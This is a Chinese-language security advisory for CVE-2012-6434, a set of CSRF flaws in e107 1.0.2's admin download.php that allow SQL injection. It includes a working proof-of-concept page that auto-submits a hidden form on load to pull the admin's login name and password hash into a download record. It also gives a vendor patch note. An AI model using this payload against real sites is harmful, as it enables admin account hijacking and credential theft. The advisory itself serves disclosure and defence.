e107 'e107_admin/download.php'跨站请求伪造漏洞

e107 'e107_admin/download.php'跨站请求伪造漏洞

发布日期：2013-01-02
更新日期：2013-01-08

受影响系统：
e107 e107 1.0.2
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57093
 CVE(CAN) ID: CVE-2012-6434
 
e107是用php编写的内容管理系统。

e107 1.0.2及其他版本的e107_admin/download.php存在多个CSRF漏洞，远程攻击者可以通过请求内 (1) download_url, (2) download_url_extended, (3) download_author_email, (4) download_author_website, (5) download_image, (6) download_thumb, (7) download_visible, (8) download_class参数的SQL注入攻击劫持管理员的身份验证，进行未授权数据库操作。
 
<*来源：Joshua Reynolds
 
  链接：http://xforce.iss.net/xforce/xfdb/80902
        http://www.exploit-db.com/exploits/23829/
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<html>
 <body onload="document.formCSRF.submit();">
    <form method="POST" name="formCSRF" action="http://ww.example.com/e107/e107102/e107_admin/download.php?create">
        <input type="hidden" name="cat_id" value="1"/>
        <input type="hidden" name="download_category" value="2"/>
        <input type="hidden" name="download_name" value="adminpassdownload"/>
        <input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/>
        <input type="hidden" name="download_url_external" value=""/>
        <input type="hidden" name="download_filesize_external" value=""/>
        <input type="hidden" name="download_filesize_unit" value="KB"/>
        <input type="hidden" name="download_author" value=""/>
        <input type="hidden" name="download_author_email" value=""/>
        <input type="hidden" name="download_author_website" value=""/>
        <input type="hidden" name="download_description" value=""/>
        <input type="hidden" name="download_image" value=""/>
        <input type="hidden" name="download_thumb" value=""/>
        <input type="hidden" name="download_datestamp" value=""/>
        <input type="hidden" name="download_active" value="1"/>
        <input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/>
        <input type="hidden" name="download_comment" value="1"/>
        <input type="hidden" name="download_visible" value="0"/>
        <input type="hidden" name="download_class" value="0"/>
        <input type="hidden" name="submit_download" value="Submit+Download"/>
    </form>
 </body>
 </html>

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
e107
 ----
 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
 
http://e107plugins.co.uk/